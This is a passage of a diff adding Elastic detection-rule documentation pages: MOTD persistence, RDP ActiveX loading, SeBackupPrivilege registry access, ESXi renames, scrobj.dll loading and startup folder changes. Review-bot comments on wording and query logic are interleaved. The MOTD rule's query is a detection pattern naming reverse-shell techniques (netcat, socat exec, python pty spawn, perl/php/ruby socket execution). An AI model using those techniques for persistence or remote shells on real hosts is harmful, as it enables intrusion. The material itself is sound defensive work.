+ +Attackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable. + +This rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses {security-guide}/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + +#### Possible Investigation Steps + +- Investigate the file that was created or modified from which the suspicious process was executed. + - !{osquery{"label":"Osquery - Retrieve File Information","query":"SELECT * FROM file WHERE path = {{file.path}}"}} +- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered. 
+ - !{osquery{"label":"Osquery - Retrieve File Listing Information","query":"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')"}} + - !{osquery{"label":"Osquery - Retrieve Additional File Listing Information","query":"SELECT\n f.path,\n u.username AS file_owner,\n g.groupname AS group_owner,\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\n datetime(f.btime, 'unixepoch') AS file_created_time,\n f.size AS size_bytes\nFROM\n file f\n LEFT JOIN users u ON f.uid = u.uid\n LEFT JOIN groups g ON f.gid = g.gid\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\n"}} +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. + - If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - File access, modification, and creation activities. + - Cron jobs, services, and other persistence mechanisms. 
+ - !{osquery{"label":"Osquery - Retrieve Crontab Information","query":"SELECT * FROM crontab"}} + +### Related Rules + +- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Delete the MOTD files or restore them to the original configuration. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type == "start" and event.action : ("exec", "exec_event") and +process.parent.executable : ("/etc/update-motd.d/*", "/usr/lib/update-notifier/*") and ( + (process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and ( + (process.args : ("-i", "-l")) or (process.parent.name == "socat" and process.parent.args : "*exec*"))) or + (process.name : ("nc", "ncat", "netcat", "nc.openbsd") and process.args_count >= 3 and + not process.args : ("-*z*", "-*l*")) or + (process.name : "python*" and process.args : "-c" and process.args : ( + "*import*pty*spawn*", "*import*subprocess*call*" + )) or + (process.name : "perl*" and process.args : "-e" and process.args : "*socket*" and process.args : ( + "*exec*", "*system*" + )) or + (process.name : "ruby*" and process.args : ("-e", "-rsocket") and process.args : ( + "*TCPSocket.new*", "*TCPSocket.open*" + )) or + (process.name : "lua*" and process.args : "-e" and process.args : "*socket.tcp*" and process.args : ( + "*io.popen*", "*os.execute*" + )) or + (process.name : "php*" and process.args : "-r" and process.args : "*fsockopen*" and process.args : "*/bin/*sh*") or + (process.name : ("awk", "gawk", "mawk", "nawk") and process.args : "*/inet/tcp/*") or + (process.name in ("openssl", "telnet")) +) and +not (process.parent.args : "--force" or process.args : ("/usr/games/lolcat", "/usr/bin/screenfetch")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Initialization Scripts +** ID: T1037 +** Reference URL: https://attack.mitre.org/techniques/T1037/ 
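Review bot: in the rule query, the final branch `(process.name in ("openssl", "telnet"))` is the only one without an argument condition, so any MOTD script that invokes openssl (a certificate-expiry check in a login banner, say) alerts, yet the False positive analysis states "This activity is unlikely to happen legitimately"; either qualify that branch like the others or document it as a known noise source alongside the `--force` / lolcat / screenfetch exclusions. Style: "#### Possible Investigation Steps" is title-cased where the other guides in this patch use "Possible investigation steps", the last remediation bullet ("Leverage the incident response data and logging...") departs from the standard wording used elsewhere ("Using the incident response data, update logging and audit policies..."), and there are two stray blank lines before the closing `----` delimiter.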
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-rdp-activex-client-loaded.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-rdp-activex-client-loaded.asciidoc new file mode 100644 index 0000000000..0bb46c154e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-rdp-activex-client-loaded.asciidoc 
@@ -0,0 +1,93 @@ +[[prebuilt-rule-8-10-5-suspicious-rdp-activex-client-loaded]] +=== Suspicious RDP ActiveX Client Loaded + +Identifies suspicious Image Loading of the Remote Desktop Services ActiveX Client (mstscax), this may indicate the presence of RDP lateral movement capability. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +any where host.os.type == "windows" and + (event.category : ("library", "driver") or (event.category == "process" and event.action : "Image loaded*")) and + (dll.name : "mstscax.dll" or file.name : "mstscax.dll") and + /* depending on noise in your env add here extra paths */ + process.executable : + ( + "C:\\Windows\\*", + "C:\\Users\\Public\\*", + "C:\\Users\\Default\\*", + "C:\\Intel\\*", + "C:\\PerfLogs\\*", + "C:\\ProgramData\\*", + "\\Device\\Mup\\*", + "\\\\*" + ) and + /* add here FPs */ + not process.executable : ("C:\\Windows\\System32\\mstsc.exe", "C:\\Windows\\SysWOW64\\mstsc.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ 
+* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-remote-registry-access-via-sebackupprivilege.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-remote-registry-access-via-sebackupprivilege.asciidoc new file mode 100644 index 0000000000..3622d6d106 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-remote-registry-access-via-sebackupprivilege.asciidoc 
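Review bot: in the Suspicious RDP ActiveX Client Loaded file above, the "==== Investigation guide" section holds an empty `[source, markdown]` block, which renders as an empty box; drop the section (the rule is not tagged "Resources: Investigation Guide") or fill it in. The description is a comma splice ("...ActiveX Client (mstscax), this may indicate the presence...") and should be two sentences. The query comments "/* depending on noise in your env add here extra paths */" and "/* add here FPs */" are author notes rather than documentation; the page would serve readers better by stating that `process.executable` is restricted to paths such as `C:\\Users\\Public\\*`, `C:\\ProgramData\\*` and UNC paths, with mstsc.exe itself excluded.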
@@ -0,0 +1,126 @@ +[[prebuilt-rule-8-10-5-suspicious-remote-registry-access-via-sebackupprivilege]] +=== Suspicious Remote Registry Access via SeBackupPrivilege + +Identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/mpgn/BackupOperatorToDA +* https://raw.githubusercontent.com/Wh04m1001/Random/main/BackupOperators.cpp +* https://www.elastic.co/security-labs/detect-credential-access + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Tactic: Credential Access +* Resources: Investigation Guide +* Use Case: Active Directory Monitoring +* Data Source: Active Directory + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious Remote Registry Access via SeBackupPrivilege + +SeBackupPrivilege is a privilege that allows file content retrieval, designed to enable users to create backup copies of the system. Since it is impossible to make a backup of something you cannot read, this privilege comes at the cost of providing the user with full read access to the file system. This privilege must bypass any access control list (ACL) placed in the system. 
+ +This rule identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate the activities done by the subject user the login session. The field `winlog.event_data.SubjectLogonId` can be used to get this data. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate abnormal behaviors observed by the subject user such as network connections, registry or file modifications, and processes created. +- Investigate if the registry file was retrieved or exfiltrated. + +### False positive analysis + +- If this activity is expected and noisy in your environment, benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Limit or disable the involved user account to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. 
+- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by winlog.computer_name, winlog.event_data.SubjectLogonId with maxspan=1m + [iam where event.action == "logged-in-special" and + winlog.event_data.PrivilegeList : "SeBackupPrivilege" and + + /* excluding accounts with existing privileged access */ + not winlog.event_data.PrivilegeList : "SeDebugPrivilege"] + [any where event.action == "Detailed File Share" and winlog.event_data.RelativeTargetName : "winreg"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Security Account Manager +** ID: T1003.002 +** Reference URL: https://attack.mitre.org/techniques/T1003/002/ +* Sub-technique: +** Name: LSA Secrets +** ID: T1003.004 +** Reference URL: https://attack.mitre.org/techniques/T1003/004/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-files.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-files.asciidoc new file mode 100644 index 0000000000..9fdc3d4596 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-files.asciidoc 
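Review bot: in the Suspicious Remote Registry Access via SeBackupPrivilege file above, two guide sentences are broken: "Investigate the activities done by the subject user the login session" is missing "during", and "This privilege must bypass any access control list (ACL)" should read "bypasses"; "privileges elevation" (description and guide) should be "privilege escalation". Documentation: the sequence joins an `event.action == "logged-in-special"` event carrying SeBackupPrivilege (and not SeDebugPrivilege) with an `event.action == "Detailed File Share"` event on `winreg` within `maxspan=1m`; the page should state which Windows audit policy subcategories must be enabled for both event types to reach the `logs-system.*` / `winlogbeat-*` indices, since the rule is silent without them.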
@@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-files]] +=== Suspicious Renaming of ESXI Files + +Identifies instances where VMware-related files, such as those with extensions like ".vmdk", ".vmx", ".vmxf", ".vmsd", ".vmsn", ".vswp", ".vmss", ".nvram", and ".vmem", are renamed on a Linux system. The rule monitors for the "rename" event action associated with these file types, which could indicate malicious activity. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.action == "rename" and +file.Ext.original.name : ("*.vmdk", "*.vmx", "*.vmxf", "*.vmsd", "*.vmsn", "*.vswp", "*.vmss", "*.nvram", "*.vmem") +and not file.name : ("*.vmdk", "*.vmx", "*.vmxf", "*.vmsd", "*.vmsn", "*.vswp", "*.vmss", "*.nvram", "*.vmem") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Rename System Utilities +** ID: T1036.003 +** Reference URL: https://attack.mitre.org/techniques/T1036/003/ 
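Review bot: the title "Suspicious Renaming of ESXI Files" should use the product casing "ESXi", matching the ESXiArgs reference the page cites. The query is sound (the original name must carry a VMware extension and the new `file.name` must not, so a .vmdk-to-.vmdk rename is ignored), but the description ends with "which could indicate malicious activity" without saying what is suspected; tie it to the ransomware scenario the linked reference describes, and add a short false-positive note for legitimate VM file renames by administrators, since the page has no investigation guide.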
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-index-html-file.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-index-html-file.asciidoc new file mode 100644 index 0000000000..62a30d6a19 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-index-html-file.asciidoc 
@@ -0,0 +1,66 @@ +[[prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-index-html-file]] +=== Suspicious Renaming of ESXI index.html File + +Identifies instances where the "index.html" file within the "/usr/lib/vmware/*" directory is renamed on a Linux system. The rule monitors for the "rename" event action associated with this specific file and path, which could indicate malicious activity. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.action == "rename" and file.name : "index.html" and +file.Ext.original.path : "/usr/lib/vmware/*" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Rename System Utilities +** ID: T1036.003 +** Reference URL: https://attack.mitre.org/techniques/T1036/003/ 
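Review bot: the description and the query disagree on which side of the rename is checked. The description says the "index.html" file within "/usr/lib/vmware/*" is renamed, but the query constrains `file.name : "index.html"`, and in the sibling ESXi rule in this patch `file.name` is the post-rename name while `file.Ext.original.name` / `file.Ext.original.path` hold the pre-rename values. As written the rule therefore fires when a file under `/usr/lib/vmware/` is renamed to index.html (the page being replaced), not when index.html is renamed away. Either reword the description to say that, or change the condition to `file.Ext.original.name : "index.html"` if the intent is the rename of the original page. Also "ESXI" in the title should be "ESXi".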
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-script-object-execution.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-script-object-execution.asciidoc new file mode 100644 index 0000000000..3b45932328 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-script-object-execution.asciidoc 
@@ -0,0 +1,85 @@ +[[prebuilt-rule-8-10-5-suspicious-script-object-execution]] +=== Suspicious Script Object Execution + +Identifies scrobj.dll loaded into unusual Microsoft processes. This usually means a malicious scriptlet is being executed in the target process. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=2m + [process where host.os.type == "windows" and event.type == "start" + and (process.code_signature.subject_name in ("Microsoft Corporation", "Microsoft Windows") and + process.code_signature.trusted == true) and + not process.executable : ( + "?:\\Windows\\System32\\cscript.exe", + "?:\\Windows\\SysWOW64\\cscript.exe", + "?:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", + "?:\\Program Files\\Internet Explorer\\iexplore.exe", + "?:\\Windows\\SystemApps\\Microsoft.MicrosoftEdge_*\\MicrosoftEdge.exe", + "?:\\Windows\\system32\\msiexec.exe", + "?:\\Windows\\SysWOW64\\msiexec.exe", + "?:\\Windows\\System32\\smartscreen.exe", + "?:\\Windows\\system32\\taskhostw.exe", + "?:\\windows\\system32\\inetsrv\\w3wp.exe", + "?:\\windows\\SysWOW64\\inetsrv\\w3wp.exe", + "?:\\Windows\\system32\\wscript.exe", + "?:\\Windows\\SysWOW64\\wscript.exe", + "?:\\Windows\\system32\\mobsync.exe", + "?:\\Windows\\SysWOW64\\mobsync.exe", + "?:\\Windows\\System32\\cmd.exe", + "?:\\Windows\\SysWOW64\\cmd.exe")] + [library where host.os.type == "windows" 
and event.type == "start" and dll.name : "scrobj.dll"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Regsvr32 +** ID: T1218.010 +** Reference URL: https://attack.mitre.org/techniques/T1218/010/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-startup-shell-folder-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-startup-shell-folder-modification.asciidoc new file mode 100644 index 0000000000..c745df82d2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-startup-shell-folder-modification.asciidoc 
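Review bot: In the Suspicious Script Object Execution query, `sequence by process.entity_id with maxspan=2m` only pairs the `scrobj.dll` load with a process start event at most two minutes earlier, so a long-lived signed process that loads the DLL later in its lifetime never alerts; the description "Identifies scrobj.dll loaded into unusual Microsoft processes" should mention this start-window limitation. Likewise `process.code_signature.trusted == true` silently drops events whose signature fields the sensor did not populate, and the page carries no investigation guide or false-positive notes explaining why the excluded hosts (cscript.exe, wscript.exe, msiexec.exe, w3wp.exe, ...) are considered benign loaders.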
@@ -0,0 +1,152 @@ +[[prebuilt-rule-8-10-5-suspicious-startup-shell-folder-modification]] +=== Suspicious Startup Shell Folder Modification + +Identifies suspicious startup shell folder modifications to change the default Startup directory in order to bypass detections monitoring file creation in the Windows Startup folder. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious Startup Shell Folder Modification + +Techniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Review the source process and related file tied to the Windows Registry entry. +- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the file using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign. + +### Related rules + +- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f +- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. 
+- Isolate the involved host to prevent further post-compromise behavior. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- If the malicious file was delivered via phishing: + - Block the email sender from sending future emails. + - Block the malicious web pages. + - Remove emails from the sender from mailboxes. + - Consider improvements to the security awareness program. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and + registry.path : ( + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Common Startup", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Common Startup", + "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup", + "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup", + "\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Common Startup", + "\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Common Startup", + "\\REGISTRY\\USER\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup", + "\\REGISTRY\\USER\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup" + ) and + registry.data.strings != null and + /* Normal Startup Folder Paths */ + not registry.data.strings : ( + "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", + "%ProgramData%\\Microsoft\\Windows\\Start 
Menu\\Programs\\Startup", + "%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", + "C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Registry Run Keys / Startup Folder +** ID: T1547.001 +** Reference URL: https://attack.mitre.org/techniques/T1547/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-symbolic-link-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-symbolic-link-created.asciidoc new file mode 100644 index 0000000000..337ef5bafd --- /dev/null +++ 